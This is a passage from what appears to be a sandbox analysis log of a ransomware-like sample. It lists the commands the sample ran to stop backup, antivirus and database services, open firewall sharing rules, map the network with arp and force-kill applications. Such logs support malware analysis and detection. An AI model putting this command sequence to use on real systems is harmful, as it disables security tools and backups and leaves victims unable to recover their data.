      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MsDtsServer /y
        PID:3620
    • C:\Windows\system32\net.exe
      "net.exe" stop “Acronis VSS Provider” /y
      PID:2992
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
        PID:3504
    • C:\Windows\system32\net.exe
      "net.exe" stop sophos /y
      PID:2984
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop sophos /y
        PID:3936
    • C:\Windows\system32\net.exe
      "net.exe" stop CAARCUpdateSvc /y
      PID:2976
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop CAARCUpdateSvc /y
        PID:3600
    • C:\Windows\system32\net.exe
      "net.exe" stop CASAD2DWebSvc /y
      PID:2968
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop CASAD2DWebSvc /y
        PID:4000
    • C:\Windows\system32\net.exe
      "net.exe" stop AcronisAgent /y
      PID:2960
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop AcronisAgent /y
        PID:3576
    • C:\Windows\system32\net.exe
      "net.exe" stop AcrSch2Svc /y
      PID:2952
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop AcrSch2Svc /y
        PID:2488
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecRPCService /y
      PID:2944
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecRPCService /y
        PID:3404
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecManagementService /y
      PID:2936
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecManagementService /y
        PID:4020
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos Web Control Service” /y
      PID:3140
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
        PID:3200
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecJobEngine /y
      PID:2928
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecJobEngine /y
        PID:3304
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecAgentBrowser /y
      PID:2912
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
        PID:3324
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecAgentAccelerator /y
      PID:2904
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
        PID:2572
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecVSSProvider /y
      PID:2896
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecVSSProvider /y
        PID:3380
    • C:\Windows\system32\net.exe
      "net.exe" stop PDVFSService /y
      PID:2888
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop PDVFSService /y
        PID:2616
    • C:\Windows\system32\net.exe
      "net.exe" stop veeam /y
      PID:2880
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop veeam /y
        PID:3176
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamNFSSvc /y
      PID:2872
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamNFSSvc /y
        PID:2652
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamDeploymentService /y
      PID:2864
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamDeploymentService /y
        PID:2424
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamTransportSvc /y
      PID:2856
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamTransportSvc /y
        PID:2680
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      PID:2844
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
        PID:2404
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
      PID:2836
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
        PID:1708
    • C:\Windows\system32\net.exe
      "net.exe" stop FA_Scheduler /y
      PID:2828
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop FA_Scheduler /y
        PID:1584
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$VEEAMSQL2012 /y
      PID:2820
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
        PID:4048
    • C:\Windows\system32\net.exe
      "net.exe" stop SDRSVC /y
      PID:2812
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SDRSVC /y
        PID:3284
    • C:\Windows\system32\net.exe
      "net.exe" stop ESHASRV /y
      PID:2804
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ESHASRV /y
        PID:2136
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
      PID:2796
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
        PID:2552
    • C:\Windows\system32\net.exe
      "net.exe" stop PDVFSService /y
      PID:2788
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop PDVFSService /y
        PID:2320
    • C:\Windows\system32\net.exe
      "net.exe" stop EsgShKernel /y
      PID:2776
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop EsgShKernel /y
        PID:2696
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$TPSAMA /y
      PID:2768
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
        PID:2264
    • C:\Windows\system32\net.exe
      "net.exe" stop ntrtscan /y
      PID:2760
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ntrtscan /y
        PID:3988
    • C:\Windows\system32\net.exe
      "net.exe" stop EPUpdateService /y
      PID:2752
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop EPUpdateService /y
        PID:2352
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$TPS /y
      PID:2744
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$TPS /y
        PID:1520
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
      PID:2736
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
        PID:2340
    • C:\Windows\system32\net.exe
      "net.exe" stop YooBackup /y
      PID:2720
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop YooBackup /y
        PID:3944
    • C:\Windows\system32\net.exe
      "net.exe" stop VSNAPVSS /y
      PID:2644
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VSNAPVSS /y
        PID:4012
    • C:\Windows\system32\net.exe
      "net.exe" stop QBCFMonitorService /y
      PID:2612
    • C:\Windows\system32\net.exe
      "net.exe" stop QBIDPService /y
      PID:2408
    • C:\Windows\system32\net.exe
      "net.exe" stop mfewc /y
      PID:2120
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
      PID:3888
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
        PID:3268
    • C:\Windows\system32\net.exe
      "net.exe" stop KAVFS /y
      PID:3648
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop KAVFS /y
        PID:3008
    • C:\Windows\system32\net.exe
      "net.exe" stop MBAMService /y
      PID:2956
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MBAMService /y
        PID:4360
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
      PID:3628
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
        PID:3212
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLWriter /y
      PID:3784
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLWriter /y
        PID:4300
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$TPS /y
      PID:3744
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$TPS /y
        PID:4072
    • C:\Windows\system32\net.exe
      "net.exe" stop swi_filter /y
      PID:3492
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop swi_filter /y
        PID:4232
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$SYSTEM_BGC /y
      PID:2980
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
        PID:4088
    • C:\Windows\system32\net.exe
      "net.exe" stop svcGenericHost /y
      PID:1064
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop svcGenericHost /y
        PID:2632
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$SQLEXPRESS /y
      PID:3876
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
        PID:3080
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$SOPHOS /y
      PID:3620
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
        PID:4224
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$SQL_2008 /y
      PID:3656
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
        PID:4080
    • C:\Windows\system32\net.exe
      "net.exe" stop sophossps /y
      PID:3836
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop sophossps /y
        PID:3840
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$SHAREPOINT /y
      PID:2144
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
        PID:2988
    • C:\Windows\system32\net.exe
      "net.exe" stop SntpService /y
      PID:3584
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SntpService /y
        PID:4272
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$SBSMONITORING /y
      PID:3576
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
        PID:3052
    • C:\Windows\system32\net.exe
      "net.exe" stop SmcService /y
      PID:3420
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SmcService /y
        PID:3120
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
      PID:3428
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
        PID:4084
    • C:\Windows\system32\net.exe
      "net.exe" stop Smcinst /y
      PID:3028
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop Smcinst /y
        PID:592
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$PROD /y
      PID:3512
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$PROD /y
        PID:4324
    • C:\Windows\system32\net.exe
      "net.exe" stop ShMonitor /y
      PID:3436
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ShMonitor /y
        PID:4556
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$PRACTTICEMGT /y
      PID:3556
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
        PID:4392
    • C:\Windows\system32\net.exe
      "net.exe" stop SepMasterService /y
      PID:3776
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SepMasterService /y
        PID:4256
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$PRACTTICEBGC /y
      PID:3756
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
        PID:4248
    • C:\Windows\system32\net.exe
      "net.exe" stop SAVService /y
      PID:3736
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SAVService /y
        PID:4332
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$ECWDB2 /y
      PID:3476
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
        PID:4308
    • C:\Windows\system32\net.exe
      "net.exe" stop SAVAdminService /y
      PID:3400
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SAVAdminService /y
        PID:3984
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$CXDB /y
      PID:3440
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$CXDB /y
        PID:4468
    • C:\Windows\system32\net.exe
      "net.exe" stop sacsvr /y
      PID:3044
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop sacsvr /y
        PID:4288
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
      PID:3456
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
        PID:240
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$SOPHOS /y
      PID:3404
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
        PID:4344
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$BKUPEXEC /y
      PID:3376
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
        PID:4116
    • C:\Windows\system32\net.exe
      "net.exe" stop sms_site_sql_backup /y
      PID:3396
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop sms_site_sql_backup /y
        PID:1952
    • C:\Windows\system32\net.exe
      "net.exe" stop mfevtp /y
      PID:3604
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop mfevtp /y
        PID:2600
    • C:\Windows\system32\net.exe
      "net.exe" stop RESvc /y
      PID:2072
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop RESvc /y
        PID:4460
    • C:\Windows\system32\net.exe
      "net.exe" stop wbengine /y
      PID:1692
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop wbengine /y
        PID:4152
    • C:\Windows\system32\net.exe
      "net.exe" stop mfemms /y
      PID:3364
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop mfemms /y
        PID:2388
    • C:\Windows\system32\net.exe
      "net.exe" stop ReportServer$SQL_2008 /y
      PID:3380
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
        PID:4100
    • C:\Windows\system32\net.exe
      "net.exe" stop wbengine /y
      PID:3352
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop wbengine /y
        PID:4180
    • C:\Windows\system32\net.exe
      "net.exe" stop mfefire /y
      PID:3332
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop mfefire /y
        PID:4128
    • C:\Windows\system32\net.exe
      "net.exe" stop OracleClientCache80 /y
      PID:3592
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop OracleClientCache80 /y
        PID:2180
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamTransportSvc /y
      PID:3312
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamTransportSvc /y
        PID:3184
    • C:\Windows\system32\net.exe
      "net.exe" stop McTaskManager /y
      PID:3516
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop McTaskManager /y
        PID:4240
    • C:\Windows\system32\net.exe
      "net.exe" stop MySQL80 /y
      PID:3004
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MySQL80 /y
        PID:3180
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamRESTSvc /y
      PID:3300
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamRESTSvc /y
        PID:1048
    • C:\Windows\system32\net.exe
      "net.exe" stop McShield /y
      PID:2848
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop McShield /y
        PID:2256
    • C:\Windows\system32\net.exe
      "net.exe" stop MySQL57 /y
      PID:3168
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MySQL57 /y
        PID:2060
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamNFSSvc /y
      PID:3468
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamNFSSvc /y
        PID:4068
    • C:\Windows\system32\net.exe
      "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
      PID:2424
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
        PID:2736
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLServerOLAPService /y
      PID:2792
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
        PID:2240
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamMountSvc /y
      PID:2468
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamMountSvc /y
        PID:2880
    • C:\Windows\system32\net.exe
      "net.exe" stop McAfeeFramework /y
      PID:2892
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop McAfeeFramework /y
        PID:4164
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLServerADHelper100 /y
      PID:2564
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
        PID:4032
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamHvIntegrationSvc /y
      PID:2860
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
        PID:1656
    • C:\Windows\system32\net.exe
      "net.exe" stop McAfeeEngineService /y
      PID:2320
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop McAfeeEngineService /y
        PID:2904
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLServerADHelper /y
      PID:2496
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLServerADHelper /y
        PID:4264
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamEnterpriseManagerSvc /y
      PID:3248
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
        PID:4476
    • C:\Windows\system32\net.exe
      "net.exe" stop MBEndpointAgent /y
      PID:2876
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MBEndpointAgent /y
        PID:3892
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLSERVER /y
      PID:2596
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLSERVER /y
        PID:2540
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamDeploySvc /y
      PID:3232
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamDeploySvc /y
        PID:4216
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLFDLauncher$TPSAMA /y
      PID:2628
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
        PID:2664
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamDeploymentService /y
      PID:2636
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamDeploymentService /y
        PID:4384
    • C:\Windows\system32\net.exe
      "net.exe" stop masvc /y
      PID:3108
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop masvc /y
        PID:4208
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLFDLauncher$TPS /y
      PID:3276
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
        PID:2248
    • C:\Windows\system32\net.exe
      "net.exe" stop KAVFSGT /y
      PID:3912
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop KAVFSGT /y
        PID:1140
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamCloudSvc /y
      PID:3256
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamCloudSvc /y
        PID:3708
    • C:\Windows\system32\net.exe
      "net.exe" stop macmnsvc /y
      PID:988
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop macmnsvc /y
        PID:1768
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
      PID:2740
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
        PID:2080
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamCatalogSvc /y
      PID:2884
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamCatalogSvc /y
        PID:2220
    • C:\Windows\system32\net.exe
      "net.exe" stop klnagent /y
      PID:2224
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop klnagent /y
        PID:2428
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecJobEngine /y
      PID:2340
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecJobEngine /y
        PID:1640
    • C:\Windows\system32\net.exe
      "net.exe" stop YooIT /y
      PID:3000
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop YooIT /y
        PID:792
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$PROD /y
      PID:2548
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$PROD /y
        PID:2984
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamBackupSvc /y
      PID:3980
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamBackupSvc /y
        PID:652
    • C:\Windows\system32\net.exe
      "net.exe" stop swi_service /y
      PID:2580
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop swi_service /y
        PID:2428
    • C:\Windows\system32\net.exe
      "net.exe" stop zhudongfangyu /y
      PID:2888
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop zhudongfangyu /y
        PID:2156
    • C:\Windows\system32\net.exe
      "net.exe" stop kavfsslp /y
      PID:3596
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop kavfsslp /y
        PID:3924
    • C:\Windows\system32\net.exe
      "net.exe" stop swi_update /y
      PID:4036
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop swi_update /y
        PID:3356
    • C:\Windows\system32\net.exe
      "net.exe" stop TrueKey /y
      PID:2188
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop TrueKey /y
        PID:3392
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLSafeOLRService /y
      PID:4044
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLSafeOLRService /y
        PID:2260
    • C:\Windows\system32\net.exe
      "net.exe" stop tmlisten /y
      PID:3096
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop tmlisten /y
        PID:2068
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLBrowser /y
      PID:2648
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLBrowser /y
        PID:3752
    • C:\Windows\system32\net.exe
      "net.exe" stop TmCCSF /y
      PID:2824
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop TmCCSF /y
        PID:3884
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$VEEAMSQL2012 /y
      PID:2724
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
        PID:2832
    • C:\Windows\system32\net.exe
      "net.exe" stop swi_update_64 /y
      PID:3580
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop swi_update_64 /y
        PID:1872
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
      PID:1384
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
        PID:1336
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$TPSAMA /y
      PID:4000
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
        PID:2608
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamBrokerSvc /y
      PID:2132
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamBrokerSvc /y
        PID:2332
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
      PID:3636
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
        Suspicious use of WriteProcessMemory
        PID:108
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLSERVERAGENT /y
      PID:3036
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLSERVERAGENT /y
        PID:2996
    • C:\Windows\system32\net.exe
      "net.exe" stop AcronisAgent /y
      PID:2124
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop AcronisAgent /y
        PID:2772
    • C:\Windows\system32\netsh.exe
      "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
      PID:2296
    • C:\Windows\system32\net.exe
      "net.exe" stop vapiendpoint /y
      PID:2304
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop vapiendpoint /y
        PID:2924
    • C:\Windows\system32\net.exe
      "net.exe" stop mssql$vim_sqlexp /y
      PID:2604
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
        PID:2880
    • C:\Windows\system32\net.exe
      "net.exe" stop WRSVC /y
      PID:3820
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop WRSVC /y
        PID:3292
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLTELEMETRY$ECWDB2 /y
      PID:2704
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
        PID:3832
    • C:\Windows\system32\net.exe
      "net.exe" stop TrueKeyServiceHelper /y
      PID:2364
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
        PID:572
    • C:\Windows\system32\netsh.exe
      "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
      PID:2756
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecManagementService /y
      PID:1212
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecManagementService /y
        PID:2208
    • C:\Windows\system32\arp.exe
      "arp" -a
      PID:2464
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$PROFXENGAGEMENT /y
      PID:2372
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
        PID:3416
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecRPCService /y
      PID:3200
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecRPCService /y
        PID:3868
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$SBSMONITORING /y
      PID:2676
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
        PID:3048
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM Ntrtscan.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3828
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM onenote.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2272
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM PccNTMon.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2504
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1356
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM sqlagent.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3888
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM sqlservr.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2592
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM steam.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3124
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM encsvc.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2396
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM excel.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2796
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM sqlbrowser.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2108
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM oracle.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3268
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM ocssd.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3128
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM ocautoupds.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2816
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mysqld-opt.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2808
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM wordpad.exe /F
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
